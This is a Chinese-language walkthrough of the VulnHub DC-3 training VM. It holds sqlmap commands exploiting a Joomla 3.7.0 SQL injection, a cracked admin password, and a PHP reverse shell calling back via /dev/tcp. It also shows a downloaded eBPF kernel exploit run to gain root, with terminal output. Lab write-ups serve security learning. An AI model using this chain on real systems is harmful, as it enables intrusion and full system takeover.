我愛做靶機之DC-3

下載地址：https://www.vulnhub.com/entry/dc-3,312/

 主機發現

掃描端口，發現只開啓了80端口，通過-A參數，還可以看到該網站的CMS爲Joomla

 訪問80端口

目錄掃描，發現網站後臺

使用nikto工具:nikto -host 192.168.44.144

使用dirsearch工具

python3 dirsearch.py -u http://192.168.44.144 -e php

使用joom專用漏洞掃描器joomscan，發現joomla的具體版本號

git clone https://github.com/rezasp/joomscan.git

cd joomscan

perl joomscan.pl 192.168.44.144

使用searchsploit搜索joomla 3.7.0存在的漏洞

searchsploit joomla 3.7.0

讀取

根據給出的路徑，讀取該文件，發現該版本cms內存在sql注入漏洞CVE-2017-8917

打開sqlmap開始注入

暴庫

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"

暴表

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables

暴字段

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns

暴內容

python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump

用戶名：admin

密碼：$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

使用kali的John進行密碼破解，得到後臺登錄密碼snoopy

進入之前找到的網站後臺進行登陸http://192.168.44.144/administrator/

在後臺翻啊翻，發現了某處可以修改網站模版的地方，可以直接新建一個PHP文件，直接反彈shell。

<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>

在kali上進行監聽，nc -lvvp 8080端口

在瀏覽器上訪問該反彈馬，這一塊路徑卡了一會兒，

結合之前目錄掃描出來的templates目錄，和模板的名稱bees3,再加上linux系統是大小敏感的，

因此花費了一些時間，才找到正確的路徑，進行訪問

這是kali已經接收到了shell，

權限很低，首先嚐試suid提權，以下命令可以發現系統上運行的suid可執行文件

1. find / -perm -u=s -type f 2>/dev/null

2. find / -user root -perm -4000 -print 2>/dev/null

3. find / -user root -perm -4000-exec ls -ldb {}

已知的可用來提權的linux可行性的文件：nmap,vim,find,bash,more,less,nano,cp

沒有發現可以利用的文件

嘗試內核提權

查看linux版本

利用searchsploit搜索可以利用的漏洞

根據路徑，訪問exp詳細內容：cat /usr/share/exploitdb/exploits/linux/local/39772.txt 

發現exp下載地址：https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

查找具有執行權限的目錄

切換到tmp文件夾下,並且下載searchsploit中的exp

切換：cd tmp

下載：wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

解壓：unzip 39773.zip

再解壓：tar -xvf exploit.tar

切換：cd ebpf_mapfd_doubleput_exploit/

執行： ./compile.sh

            ./doubleput

然後得到了root權限

www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<ploitdb-bin-sploits/raw/master/bin-sploits/39772.zip                                                                                                                
--2020-04-09 23:27:16--  https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip                                                
Resolving github.com (github.com)... 13.250.177.223                                                                                                                  
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17--  https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'

     0K ......                                                100% 4.44M=0.002s

2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]

www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive:  39772.zip
   creating: 39772/
  inflating: 39772/.DS_Store         
   creating: __MACOSX/
   creating: __MACOSX/39772/
  inflating: __MACOSX/39772/._.DS_Store  
  inflating: 39772/crasher.tar       
  inflating: __MACOSX/39772/._crasher.tar  
  inflating: 39772/exploit.tar       
  inflating: __MACOSX/39772/._exploit.tar  
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh                      
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .insns = (__aligned_u64) insns,
             ^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
    .license = (__aligned_u64)""
               ^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput                       
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...

bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$